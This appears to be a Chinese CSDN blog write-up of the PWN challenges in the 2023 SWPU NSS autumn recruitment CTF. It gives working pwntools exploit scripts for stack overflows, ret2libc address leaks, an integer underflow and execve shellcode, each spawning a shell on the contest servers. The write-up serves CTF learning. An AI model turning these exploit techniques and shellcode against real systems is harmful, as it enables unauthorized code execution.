2023年SWPU NSS 秋季招新赛 PWN

已于 2023-10-24 14:14:47 修改
阅读量537 收藏
点赞数
分类专栏: PWN 文章标签: 网络安全 安全 1024程序员节
于 2023-10-20 22:04:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/133945990
版权

简介:

西南石油大学举办的一场新生赛,总体来说举办的不错,支持支持,明年再来!!!

guess me

签到题,nc再猜猜就完事了

签到

签到题,栈溢出,带有后面函数,唯一需要注意的就是需要栈平衡(加个ret就行)

exp如下:

from pwn import *
context(arch="amd64",os="linux",log_level="debug")

#io =process("./111")
io =remote('node4.anna.nssctf.cn',28836)

backdoor =0x401232
ret_addr =0x40101a

payload =b'A'*(0X30 +8) +p64(ret_addr) +p64(backdoor)

io.sendline(payload)
io.interactive()

ezlibc

经典32位泄露libc,不太懂的可以看看Pwn Pwn Pwn!!! 技巧(1),这题就是通过write函数泄露libc,自己构造rop链,来获取shell

exp如下:

from pwn import *
context(arch="amd64",os="linux",log_level="debug")

#io =process("./111")
io =remote('node6.anna.nssctf.cn',28337)
elf =ELF('./111')
libc =ELF('./libc-2.31.so')

ret_addr =0x804900e
main_addr =0x80491B6

payload =b'A'*(0x10 +4) +p32(elf.plt['write']) +p32(main_addr) +p32(1)+ p32(elf.got['write']) +p32(4)

io.recvuntil(b'Hello, there is a ez libc test!!!input:')
io.sendline(payload)

write_addr = u32(io.recvuntil(b'\xf7')[-4:])
print(hex(write_addr))

libc_base = write_addr - libc.sym['write']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))

payload =b'A'*(0x10 +4) +p32(ret_addr) +p32(sys_addr) +p32(0) +p32(bin_sh)

io.sendline(payload)
io.interactive()

buy

这题也不难,认真的代码审计就行,仔细的去理清里面的逻辑就行,刚开始看vuln函数,你就会发现door函数里面发生了栈溢出,并且还带有后门函数mygift,可以利用栈溢出来获得shell,那我们的首要目的就是让key等于 1 ,这样才能执行door函数

然后我们就找啊找啊,发现在food函数可以实现key等于1,但前提就是money必须大于10000,同时你也会发现money的数据类型是无符号整形,让他等于负数,就可以实现整形溢出的效果,这样money就会蹭蹭的往上涨,其次需要注意的就是不同函数的来回切换,你需要想好你要干什么,这样才能获得shell,这题同样需要栈平衡(怎么判呢?如果 payload =垃圾数据 +system +binsh打不通的话,不妨试试在system前面加个 ret栈平衡一下 )

exp如下:

from pwn import *
context(arch="amd64",os="linux",log_level="debug")

#io =process("./111")
io =remote('node6.anna.nssctf.cn',28209)

backdoor =0x401544
ret_addr =0x40101a

io.sendlineafter(b'your choice:\n',b'1')
io.sendlineafter(b'what do you want?\n',b'1')
io.sendlineafter(b'How many?\n',b'-11')

io.sendlineafter(b'your choice:\n',b'2')
io.sendlineafter(b'what do you want?\n',b'1')
io.sendlineafter(b'How many?\n',b'1')

payload =b'A'*(0XA +8) +p64(ret_addr) +p64(backdoor)

io.recvuntil(b'input:\n')
io.sendline(payload)
io.interactive()

神奇的strlen

查看一下保护机制,只打开了NX

ida反汇编一下,发现发生了栈溢出,但是前提是需要绕过strlen(只需要通过 '\x00' 绕过),还有一个点需要注意就是上面需要输入一个整数(尽可能大点的数就行),这里有个坑不知道你们踩了没,这题是用 puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) (而不是用 puts_addr = u64(p.recvuntil(b'\x7f')[:6].ljust(8, b'\x00'))希望大家注意一下,弄得我想半天没有写出来)准备工作完毕,开干

exp如下:

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux',log_level='debug')

p =remote('node4.anna.nssctf.cn',28171)
elf =ELF('./111')
libc = ELF('libc.so.6')

got_addr = elf.got['puts']
plt_addr = elf.plt['puts']
main_addr =0x4011F6
rdi_addr =0x401373
ret_addr =0x40101a

p.sendlineafter('How many bytes do you want to input?\n',b'200')

payload =b'\x00' +b'A'*(0x40 +7) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)
p.recvuntil(b'input something else~\n')
p.sendline(payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

#put_addr =u64(io.recv(6).ljust(8,b'\x00'))
#print(hex(put_addr))

libc_base = puts_addr - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))

p.sendlineafter('How many bytes do you want to input?\n',b'200')

payload=b'\x00' +b'a'*(0x40 +7) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)
p.recvuntil(b'input something else~\n')

p.sendline(payload)
p.interactive()

Shellcode

正常的一道shellcode的题目,刚开始不能反汇编,以为会很难(因为汇编代码不是很懂),结果发现直接上就完事了(注意一下64位的环境就行)

exp如下:

from pwn import *
context(log_level='debug',arch='amd64', os='linux')

#p=process('./111')
p=remote('node4.anna.nssctf.cn',28131)

#payload = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'

payload =asm(shellcraft.sh())

p.sendline(payload)
p.interactive()

总结:

这次比赛总体不错,RE和CRYPTO都做了些,可惜的就是PWN没有ak,暴露出了自己的弱点,还是要慢慢沉淀,对汇编还真的不是很熟,加油吧,冲冲冲!!!

Xzzzz911
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
[SWPUCTF 2023 秋季新生赛] web题解
rev1ve的博客
10-21 1613
然后就是上传的时候有两个if语句,第一个成立,第二个不成立。由于GET和POST传同一个参数没有先后顺序,所以不能用下面的方式去实现变量覆盖。分析一下,MD5和sha1都可以用数组绕过,然后用php伪协议中的data协议。分析一下,首先是参数名利用php解析特性;强等于,但是__wakeup方法会赋值,所以采取引用绕过的方式,exp如下。我们可以bp抓包,依次再三个参数fuzz测试(在页面处输入不了。考点:源码泄露,变量引用绕过__wakeup,php变量覆盖。打开题目,先试试普通一句话木马,发现被检测。
2023SWPU NSS 秋季招新赛 (校外赛道) PWN 题解
2301_77205899的博客
10-24 230
food函数中输入数量 v1为int类型 可以为负数 只要输入一个较大的负数即可使money>10000。read函数 可以溢出 buf距离rbp0xa 但是read可以读入0x10000 后门函数已经给出。简单猜数字 不用脚本 先输入50 如果大了就再输入25小了就75 以此类推。直接利用pwntools写shellcode即可。然后利用泄露puts地址 得到libc基地址。/x00 绕过strlen检测。再执行以下函数door()exp python3语法。
[SHCTF 2023 校外赛道] pwn
weixin_52640415的博客
10-30 311
有19道题这么多,不过基本是入门题,都是在骗新生,看这么容易快来PWN吧!
2023SWPU NSS 秋季招新赛 CTF Reverse‘方向WP详解
Sciurdae的博客
10-20 953
无壳64bit文件,,ida64分析标准的base64,
NSSCTF-2023SWPU NSS秋季招新赛校外赛道)- Misc:我要成为原神高手
wsj14623的博客
10-20 424
vector < int > 赛诺 ( int 派蒙 ) { vector < int > 荧;空 ++ ) { int 寝子 = 荧 [ 空 - 1 ] + 荧 [ 空 - 2 ];} string 尼禄 ( const string & 派蒙 , const vector < int > & 空 ) { string 荧 = 派蒙;1. 先打开我要成为原神高手.miHoYo文件发现:#include "result.h",应该是道C语言编程题目,搜索了一圈都没发现原神的姓名对应字符的文章。
NSSCTF-2023SWPU NSS秋季招新赛校外赛道)-colorful_snake
qq_68581192的博客
10-14 507
发现有function this_is_flag字样,复制encodedStriing内的内容,去搜索。两个都试一下,发现只有第二个的flag能成功。发现是ASCII码,找到在线转换ASCII。右键点击检查,找到Source。
NSSCTF-[SWPUCTF 2023 秋季新生赛]-web
J1ng_Hong的博客
11-19 521
发现需要md5值相等,一开始想到的是:用0e开头的md5值为0进行比较,但是尝试了发现不行。用burp抓包看看信息,发现了每次买道具都是/buy/n,其中n是商品代号。然后我们直接在网页上payload,因为burp里payload发不出去了。但是由于if和else只能执行一个,而且$被ban了,所以a和b的值不能手动改。发现可以,然后需要蚁剑连接。进题是一个大卖场,我看了hint,发现给了一个username,以为是正常的sql注入,但是发现没有回显。然后把金额改成1元,买了flag然后去背包看看就行。
2023SWPU NSS Crpyto WP
2301_76718200的博客
10-20 279
链接:https://pan.baidu.com/s/1tYgBEozNFd7TauPv9gP4rQ?另外还分享一个密码工具可以解这里面好像一共6题可以跑出来(是否会使用看自己咯)这题更dpdp的dp分离的原理不一样这是通过求p的最大公约数来推到计算。可以看出是rsa算法中的已知p,q,e,c求明文m。已知h加密后密文和x私钥的解密指数从而求的明文m。可以看出是rsa算法中的已知n,e,c求明文m。看到是加密的码表,使用base64换表。如以上可以看出是rsa中的pd泄露。兔子解密(Rabbit)
[SWPUCTF 2023 秋季新生赛]——Web方向 详细Writeup
Leaf_initial的博客
10-22 1510
来玩贪吃蛇~F12查看源代码,可以看到函数,发现是unicode编码利用网站转换得到flag。
SWPU大数据概论课程报告
01-31
仅作备份
swpu前端实验4的实验
04-23
swpu
[SWPUCTF 2021 新生赛]traditional
03-15
[SWPUCTF 2021 新生赛]traditional
SWPU学分绩点计算器女生版
02-06
SWPU 学分绩点 计算器 女生版 所谓女生版就是指的GUI稍微美化了一点点,我承认是标题党....
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
SWPU NSS新生赛(校外通道)
qq_62046696的博客
11-02 571
我们的目的,就是通过get传参p然后,借助 call_user_func调用nss中的ctf静态方法。可以通过NSS::CTF调用类中的CTF的静态方法,这里的类名和方法名不区分大小写。比赛结束后,放出了源码,才恍然大悟,其实不难,就是自己要重复实验操作。然后抓包或f12,看见提示了超链接/js/1.js,访问试一下。打开界面以后,发现禁用了ctrl+u和查看源码,就是禁用了n和c,然后/m以多文本形式,然后上传一个.jpg文件木马就可以,禁了。有延迟然后报错,估计是php被过滤掉了。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8261
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
漫谈企业信息化安全 - 零信任架构
SplashtopLoki的博客
05-27 1201
SDP是一种网络安全框架,旨在提供安全、隐私和访问控制,通过创建一种透明的、动态的连接模型,将用户和设备与应用程序之间的连接限制在一个隐形的、不可见的网络边界之内。SDP的目标是通过动态生成的边界实现更加精细的访问控制和安全性。
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 277
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
2023SWPU NSS 秋季招新赛
10-18
2023SWPU NSS2023SWPU NSS2023SWPU NSS秋季招新赛是指西南石油大学网络安全协会(NSS)在2023秋季举办的招新赛NSS是一个由热爱网络安全的学生自发组织的团队,旨在提高学生的网络安全意识和技能。招新赛通常包括笔试和面试两个环节,笔试主要考察应聘者的基础知识和技能,面试则主要考察应聘者的综合素质和团队合作能力。具体的招新时间和要求可以关注NSS官方网站或者官方微信公众号获取。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值